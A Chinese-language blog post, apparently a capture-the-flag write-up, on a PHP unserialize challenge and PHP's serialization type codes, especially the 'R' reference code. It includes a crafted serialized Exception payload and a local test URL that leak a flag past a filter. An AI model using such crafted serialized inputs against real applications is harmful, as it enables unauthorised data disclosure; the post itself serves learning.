<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"550532788.github.io","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="0x00 前言​    今天下午做了一道反序列化，彻底刷新了我对php的认知。这里记录一下吧。">
<meta property="og:type" content="article">
<meta property="og:title" content="浅谈php反序列化的参数类型">
<meta property="og:url" content="https://550532788.github.io/2020/08/26/%E6%B5%85%E8%B0%88php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E5%8F%82%E6%95%B0%E7%B1%BB%E5%9E%8B/index.html">
<meta property="og:site_name" content="Cxlover&#39;s blog">
<meta property="og:description" content="0x00 前言​    今天下午做了一道反序列化，彻底刷新了我对php的认知。这里记录一下吧。">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-08-26T02:07:04.106Z">
<meta property="article:modified_time" content="2020-08-26T02:07:04.106Z">
<meta property="article:author" content="Cxlover">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://550532788.github.io/2020/08/26/%E6%B5%85%E8%B0%88php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E5%8F%82%E6%95%B0%E7%B1%BB%E5%9E%8B/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>浅谈php反序列化的参数类型 | Cxlover's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Cxlover's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section">Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section">Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://550532788.github.io/2020/08/26/%E6%B5%85%E8%B0%88php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E5%8F%82%E6%95%B0%E7%B1%BB%E5%9E%8B/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://images.cnblogs.com/cnblogs_com/cioi/1558332/o_200826022332avatar.gif">
      <meta itemprop="name" content="Cxlover">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Cxlover's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          浅谈php反序列化的参数类型
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-08-26 10:07:04" itemprop="dateCreated datePublished" datetime="2020-08-26T10:07:04+08:00">2020-08-26</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a><code>0x00</code> 前言</h3><p>​    今天下午做了一道反序列化，彻底刷新了我对<code>php</code>的认知。这里记录一下吧。</p>
<a id="more"></a>

<h3 id="0x01-源码"><a href="#0x01-源码" class="headerlink" title="0x01 源码"></a><code>0x01</code> 源码</h3><p>​    不知道是什么比赛的题目，不过无所谓了，快乐就好了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>); </span><br><span class="line"><span class="keyword">include</span> <span class="string">"flag.php"</span>;</span><br><span class="line">$a = $_GET[<span class="string">'a'</span>]; </span><br><span class="line">$b = unserialize ($a); </span><br><span class="line">$b-&gt;c = $flag; </span><br><span class="line"><span class="comment">#var_dump($b);</span></span><br><span class="line"><span class="keyword">foreach</span>($b <span class="keyword">as</span> $key =&gt; $value) </span><br><span class="line">&#123; </span><br><span class="line">        <span class="keyword">if</span>($key===<span class="string">'c'</span>) </span><br><span class="line">        &#123; </span><br><span class="line">                <span class="keyword">continue</span>; </span><br><span class="line">        &#125; </span><br><span class="line">        <span class="keyword">echo</span> $value; </span><br><span class="line">&#125; </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>​    这里因为考虑的时间太长了，导致环境关闭了，所以自己在本地测试了。测试代码和环境如下:</p>
<p><code>flag.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>); </span><br><span class="line"></span><br><span class="line">$a = $_GET[<span class="string">'a'</span>]; </span><br><span class="line">$b = unserialize ($a); </span><br><span class="line">$b-&gt;c = <span class="string">'flag&#123;6514534685478&#125;'</span>; </span><br><span class="line"><span class="comment">#var_dump($b);</span></span><br><span class="line"><span class="keyword">foreach</span>($b <span class="keyword">as</span> $key =&gt; $value) </span><br><span class="line">&#123; </span><br><span class="line">        <span class="keyword">if</span>($key===<span class="string">'c'</span>) </span><br><span class="line">        &#123; </span><br><span class="line">                <span class="keyword">continue</span>; </span><br><span class="line">        &#125; </span><br><span class="line">        <span class="keyword">echo</span> $value; </span><br><span class="line">&#125; </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>测试环境</code>:<code>Windows + PHP5.6 + Apache</code></p>
<h3 id="0x02-分析"><a href="#0x02-分析" class="headerlink" title="0x02 分析"></a><code>0x02</code> 分析</h3><h4 id="2-1-noclass"><a href="#2-1-noclass" class="headerlink" title="2.1 noclass"></a><code>2.1 noclass</code></h4><p>​    首先题目的名称是<code>noclass</code>。而本题也确实没有<code>class</code>。那么应该就是寻找<code>php</code>的原生类了。这个我们在极光的第二周周练的时候找过，但是肯定不是那么简单。不过首先我们要搞懂为什么我们要使用原生类。我们考虑下面的一段代码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">'O:4:"test":1:&#123;s:1:"a";s:6:"123456";&#125;'</span>;</span><br><span class="line">var_dump(unserialize($a));</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">测试结果:</span><br><span class="line">object(__PHP_Incomplete_Class)<span class="comment">#1 (2) &#123; ["__PHP_Incomplete_Class_Name"]=&gt; string(4) "test" ["a"]=&gt; string(6) "123456" &#125;</span></span><br></pre></td></tr></table></figure>

<p>​    明明是可以直接反序列化的，那么我们为什么还要找原生类呢？考虑下面的一段代码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">'O:4:"test":1:&#123;s:1:"a";s:6:"123456";&#125;'</span>;</span><br><span class="line">$b = unserialize($a);</span><br><span class="line">$b-&gt;a = <span class="string">"cioier"</span>;</span><br><span class="line">var_dump($b);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line">测试结果:</span><br><span class="line"></span><br><span class="line">Notice: main(): The script tried to execute a method or access a property of an incomplete object. Please ensure that the class definition "test" of the object you are trying to operate on was loaded _before_ unserialize() gets called or provide a __autoload() function to load the class definition in E:\phpStudy_2014.10.02_XiaZaiBa\WWW\test\w.php on line 4</span><br><span class="line">object(__PHP_Incomplete_Class)<span class="comment">#1 (2) &#123; ["__PHP_Incomplete_Class_Name"]=&gt; string(4) "test" ["a"]=&gt; string(6) "123456" &#125;</span></span><br></pre></td></tr></table></figure>

<p>​    除去报错可以看到，我们的属性<code>a</code>的值并没有改变。这也就是为什么我们需要原生类的理由。匿名类的属性是无法被赋值的。</p>
<h4 id="2-2-Exception"><a href="#2-2-Exception" class="headerlink" title="2.2 Exception"></a><code>2.2 Exception</code></h4><p>​    这个类相信大家都不陌生。这就是常见的<code>php</code>反序列化中的使用<code>__toString</code>方法进行<code>XSS</code>的。这里我们并不需要它的<code>__toString</code>方法。我们只需要它可以修改<code>c</code>属性的值就可以了。参考代码如下:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = unserialize(<span class="string">'O:9:"Exception":7:&#123;s:10:"*message";s:4:"1111";s:17:"Exceptionstring";s:0:"";s:7:"*code";i:0;s:7:"*file";s:46:"E:\phpStudy_2014.10.02_XiaZaiBa\WWW\test\w.php";s:7:"*line";i:3;s:16:"Exceptiontrace";a:0:&#123;&#125;s:19:"Exceptionprevious";N;&#125;'</span>);</span><br><span class="line">$a-&gt;c = <span class="string">"flag&#123;   &#125;"</span>;</span><br><span class="line">var_dump($a);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">测试结果:</span><br><span class="line">object(stdClass)<span class="comment">#1 (1) &#123; ["c"]=&gt; string(9) "flag&#123; &#125;" &#125;</span></span><br></pre></td></tr></table></figure>

<p>PS: 其实这里是有个小问题的，不知道大家看出来没有。反正懒得改了。</p>
<h4 id="2-3-Quote"><a href="#2-3-Quote" class="headerlink" title="2.3 Quote"></a><code>2.3 Quote</code></h4><p>​    之后在找资料的时候看到了<code>&amp;</code>这个东西，突然突发奇想，我们直接使用别的变量将其带出来不就完事了吗？我们采用下面的代码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">    $a = <span class="keyword">new</span> <span class="keyword">Exception</span>(<span class="string">"1111"</span>);</span><br><span class="line">    <span class="comment">#echo serialize($a);</span></span><br><span class="line">	</span><br><span class="line">$a-&gt;c = <span class="string">"wwwww"</span>;</span><br><span class="line">$a-&gt;m = &amp;$a-&gt;c;</span><br><span class="line">	<span class="keyword">echo</span> urlencode(serialize($a));</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">测试结果:</span><br><span class="line">O%<span class="number">3</span>A9%<span class="number">3</span>A%<span class="number">22</span><span class="keyword">Exception</span>%<span class="number">22</span>%<span class="number">3</span>A9%<span class="number">3</span>A%<span class="number">7</span>Bs%<span class="number">3</span>A10%<span class="number">3</span>A%<span class="number">22</span>%<span class="number">00</span>%<span class="number">2</span>A%<span class="number">00</span>message%<span class="number">22</span>%<span class="number">3</span>Bs%<span class="number">3</span>A4%<span class="number">3</span>A%<span class="number">221111</span>%<span class="number">22</span>%<span class="number">3</span>Bs%<span class="number">3</span>A17%<span class="number">3</span>A%<span class="number">22</span>%<span class="number">00</span><span class="keyword">Exception</span>%<span class="number">00</span>string%<span class="number">22</span>%<span class="number">3</span>Bs%<span class="number">3</span>A0%<span class="number">3</span>A%<span class="number">22</span>%<span class="number">22</span>%<span class="number">3</span>Bs%<span class="number">3</span>A7%<span class="number">3</span>A%<span class="number">22</span>%<span class="number">00</span>%<span class="number">2</span>A%<span class="number">00</span>code%<span class="number">22</span>%<span class="number">3</span>Bi%<span class="number">3</span>A0%<span class="number">3</span>Bs%<span class="number">3</span>A7%<span class="number">3</span>A%<span class="number">22</span>%<span class="number">00</span>%<span class="number">2</span>A%<span class="number">00</span>file%<span class="number">22</span>%<span class="number">3</span>Bs%<span class="number">3</span>A49%<span class="number">3</span>A%<span class="number">22</span>E%<span class="number">3</span>A%<span class="number">5</span>CphpStudy_2014<span class="number">.10</span><span class="number">.02</span>_XiaZaiBa%<span class="number">5</span>CWWW%<span class="number">5</span>Ctest%<span class="number">5</span>Ctest.php%<span class="number">22</span>%<span class="number">3</span>Bs%<span class="number">3</span>A7%<span class="number">3</span>A%<span class="number">22</span>%<span class="number">00</span>%<span class="number">2</span>A%<span class="number">00</span>line%<span class="number">22</span>%<span class="number">3</span>Bi%<span class="number">3</span>A3%<span class="number">3</span>Bs%<span class="number">3</span>A16%<span class="number">3</span>A%<span class="number">22</span>%<span class="number">00</span><span class="keyword">Exception</span>%<span class="number">00</span>trace%<span class="number">22</span>%<span class="number">3</span>Ba%<span class="number">3</span>A0%<span class="number">3</span>A%<span class="number">7</span>B%<span class="number">7</span>Ds%<span class="number">3</span>A19%<span class="number">3</span>A%<span class="number">22</span>%<span class="number">00</span><span class="keyword">Exception</span>%<span class="number">00</span>previous%<span class="number">22</span>%<span class="number">3</span>BN%<span class="number">3</span>Bs%<span class="number">3</span>A1%<span class="number">3</span>A%<span class="number">22</span>c%<span class="number">22</span>%<span class="number">3</span>Bs%<span class="number">3</span>A5%<span class="number">3</span>A%<span class="number">22</span>wwwww%<span class="number">22</span>%<span class="number">3</span>Bs%<span class="number">3</span>A1%<span class="number">3</span>A%<span class="number">22</span>m%<span class="number">22</span>%<span class="number">3</span>BR%<span class="number">3</span>A9%<span class="number">3</span>B%<span class="number">7</span>D</span><br></pre></td></tr></table></figure>

<p>​        然后我们就可以将数据带出啦。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;127.0.0.1&#x2F;test&#x2F;flag.php?a&#x3D;O%3A9%3A%22Exception%22%3A9%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A4%3A%221111%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A49%3A%22E%3A%5CphpStudy_2014.10.02_XiaZaiBa%5CWWW%5Ctest%5Ctest.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A3%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3Bs%3A1%3A%22c%22%3Bs%3A5%3A%22wwwww%22%3Bs%3A1%3A%22m%22%3BR%3A9%3B%7D</span><br></pre></td></tr></table></figure>

<p>​    测试结果:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);  </span><br><span class="line"></span><br><span class="line">$a = $_GET[<span class="string">'a'</span>];  </span><br><span class="line">$b = unserialize ($a);  </span><br><span class="line">$b-&gt;c = <span class="string">'flag&#123;6514534685478&#125;'</span>;  </span><br><span class="line"><span class="comment">#var_dump($b); </span></span><br><span class="line"><span class="keyword">foreach</span>($b <span class="keyword">as</span> $key =&gt; $value)  </span><br><span class="line">&#123;  </span><br><span class="line">        <span class="keyword">if</span>($key===<span class="string">'c'</span>)  </span><br><span class="line">        &#123;  </span><br><span class="line">                <span class="keyword">continue</span>;  </span><br><span class="line">        &#125;  </span><br><span class="line">        <span class="keyword">echo</span> $value;  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="meta">?&gt;</span> flag&#123;<span class="number">6514534685478</span>&#125;</span><br></pre></td></tr></table></figure>

<p>​    就将<code>flag</code>带出来了。</p>
<h4 id="2-3-Parameter"><a href="#2-3-Parameter" class="headerlink" title="2.3 Parameter"></a><code>2.3 Parameter</code></h4><p>​    虽然我们成功的把<code>flag</code>带了出来。但是我们本次的目的并不是<code>flag</code>。而是反序列化中的类型参数。比如上图中我们的参数就是下面的样子。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:<span class="number">9</span>:<span class="string">"Exception"</span>:<span class="number">9</span>:&#123;s:<span class="number">10</span>:<span class="string">"*message"</span>;s:<span class="number">4</span>:<span class="string">"1111"</span>;s:<span class="number">17</span>:<span class="string">"Exceptionstring"</span>;s:<span class="number">0</span>:<span class="string">""</span>;s:<span class="number">7</span>:<span class="string">"*code"</span>;i:<span class="number">0</span>;s:<span class="number">7</span>:<span class="string">"*file"</span>;s:<span class="number">49</span>:<span class="string">"E:\phpStudy_2014.10.02_XiaZaiBa\WWW\test\test.php"</span>;s:<span class="number">7</span>:<span class="string">"*line"</span>;i:<span class="number">3</span>;s:<span class="number">16</span>:<span class="string">"Exceptiontrace"</span>;a:<span class="number">0</span>:&#123;&#125;s:<span class="number">19</span>:<span class="string">"Exceptionprevious"</span>;N;s:<span class="number">1</span>:<span class="string">"c"</span>;s:<span class="number">5</span>:<span class="string">"wwwww"</span>;s:<span class="number">1</span>:<span class="string">"m"</span>;R:<span class="number">9</span>;&#125;</span><br></pre></td></tr></table></figure>

<p>​    看到了<code>R</code>相信好多师傅都蒙了。这就是我们今天重点提的东西:反序列化参数的类型。</p>
<p>​    我们熟知的参数有下面的几种:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">String  : s:size:value;</span><br><span class="line">Integer : i:value;</span><br><span class="line">Boolean : b:value;(保存<span class="number">1</span>或<span class="number">0</span>)</span><br><span class="line"><span class="keyword">Null</span> 	: N;</span><br><span class="line"><span class="keyword">Array</span>   : a:size:&#123;key definition;value definition;(repeated per element)&#125;</span><br><span class="line">Object  : O:strlen(object name):object name:object size:&#123;s:strlen(property name):property name:property definition;(repeated per property)&#125;</span><br></pre></td></tr></table></figure>

<p>​    然后翻阅官方文档之后，发现有这样的解释:</p>
<blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">after serializing <span class="keyword">and</span> unserializing, slice <span class="number">1</span> is no longer a reference to the <span class="keyword">array</span> itself... I have found no way around this problem... even manually modifying the serialized string from </span><br><span class="line"><span class="string">'a:2:&#123;i:0;s:4:"pleh";i:1;a:2:&#123;i:0;s:4:"pleh";i:1;R:3;&#125;&#125;'</span> </span><br><span class="line">to </span><br><span class="line"><span class="string">'a:2:&#123;i:0;s:4:"pleh";i:1;R:1;&#125;'</span> </span><br><span class="line"></span><br><span class="line">to force the second slice to be a reference to the first element of the serialization (the <span class="keyword">array</span> itself), it seemed to work at first glance, but then unreferences it when you alter it again, observe</span><br></pre></td></tr></table></figure>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">    $testser = <span class="string">'a:2:&#123;i:0;s:4:"pleh";i:1;R:1;&#125;'</span>; </span><br><span class="line">    $tmp = unserialize($testser); </span><br><span class="line">    print_r($tmp); </span><br><span class="line">    <span class="keyword">print</span> <span class="string">"\n-----------------------\n"</span>; </span><br><span class="line">    $tmp[<span class="number">1</span>][<span class="number">0</span>] = <span class="string">"blah"</span>; </span><br><span class="line">    print_r($tmp); </span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span> </span><br><span class="line">测试结果:</span><br><span class="line">outputs: </span><br><span class="line"><span class="keyword">Array</span> </span><br><span class="line">( </span><br><span class="line">    [<span class="number">0</span>] =&gt; pleh </span><br><span class="line">    [<span class="number">1</span>] =&gt; <span class="keyword">Array</span> </span><br><span class="line">*RECURSION* </span><br><span class="line">) </span><br><span class="line"></span><br><span class="line">----------------------- </span><br><span class="line"><span class="keyword">Array</span> </span><br><span class="line">( </span><br><span class="line">    [<span class="number">0</span>] =&gt; pleh </span><br><span class="line">    [<span class="number">1</span>] =&gt; <span class="keyword">Array</span> </span><br><span class="line">        ( </span><br><span class="line">            [<span class="number">0</span>] =&gt; blah </span><br><span class="line">            [<span class="number">1</span>] =&gt; <span class="keyword">Array</span> </span><br><span class="line">                ( </span><br><span class="line">                    [<span class="number">0</span>] =&gt; pleh </span><br><span class="line">                    [<span class="number">1</span>] =&gt; <span class="keyword">Array</span> </span><br><span class="line">*RECURSION* </span><br><span class="line">                ) </span><br><span class="line"></span><br><span class="line">        ) </span><br><span class="line"></span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>​    然后，我们自己测试一下呗。这次把<code>R:1</code>改为<code>R:2</code>。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">    $testser = <span class="string">'a:2:&#123;i:0;s:4:"pleh";i:1;R:2;&#125;'</span>; </span><br><span class="line">    $tmp = unserialize($testser); </span><br><span class="line">    print_r($tmp); </span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">    <span class="keyword">print</span> <span class="string">"\n-----------------------\n"</span>; </span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">    $tmp[<span class="number">1</span>][<span class="number">0</span>] = <span class="string">"blah"</span>; </span><br><span class="line">    print_r($tmp); </span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span> </span><br><span class="line">测试结果:</span><br><span class="line"><span class="keyword">Array</span> ( [<span class="number">0</span>] =&gt; pleh [<span class="number">1</span>] =&gt; pleh ) </span><br><span class="line">----------------------- </span><br><span class="line"><span class="keyword">Array</span> ( [<span class="number">0</span>] =&gt; bleh [<span class="number">1</span>] =&gt; bleh )</span><br></pre></td></tr></table></figure>

<p>​    我们可以看到<code>R:1</code>指的就是<code>Array</code>本身，而<code>R:2</code>就是<code>$tmp[1][0]</code>的值。到这里，相信各位师傅也明白了这些东西。我就不多赘述了。</p>
<p>PS: 除了<code>R</code>之外，我又发现了一个快乐的东西。官方文档有这样的一段代码:</p>
<blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">Serializing floating point numbers leads to weird precision offset errors:</span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> round(<span class="number">96.670000000000002</span>, <span class="number">2</span>);</span><br><span class="line"><span class="comment">// 96.67</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> serialize(round(<span class="number">96.670000000000002</span>, <span class="number">2</span>));</span><br><span class="line"><span class="comment">// d:96.670000000000002;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> serialize(<span class="number">96.67</span>);</span><br><span class="line"><span class="comment">// d:96.670000000000002;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">Not only is this wrong, but it adds a lot of unnecessary bulk to serialized data. Probably better to <span class="keyword">use</span> <span class="title">json_encode</span>() <span class="title">instead</span> (<span class="title">which</span> <span class="title">apparently</span> <span class="title">is</span> <span class="title">faster</span> <span class="title">than</span> <span class="title">serialize</span>(), <span class="title">anyway</span>).</span><br></pre></td></tr></table></figure>
</blockquote>
<p>​    而我在意的并不是精度，而是<code>d</code>这个参数，那么下篇文章就让我们去看一下这个参数吧。(挖坑)</p>
<h3 id="0x03-后记"><a href="#0x03-后记" class="headerlink" title="0x03 后记"></a><code>0x03</code> 后记</h3><p>​    很快乐。终于完成了。</p>
<h3 id="0x04-参考"><a href="#0x04-参考" class="headerlink" title="0x04 参考"></a><code>0x04</code> 参考</h3><p><code>php官方文档</code>：</p>
<p><a href="https://www.php.net/manual/en/function.serialize.php" target="_blank" rel="noopener">https://www.php.net/manual/en/function.serialize.php</a></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/08/21/%5BCISCN%E5%8D%8E%E4%B8%AD%E8%B5%9B%E5%8C%BA%20web%5D/" rel="prev" title="[CISCN华中赛区 web]">
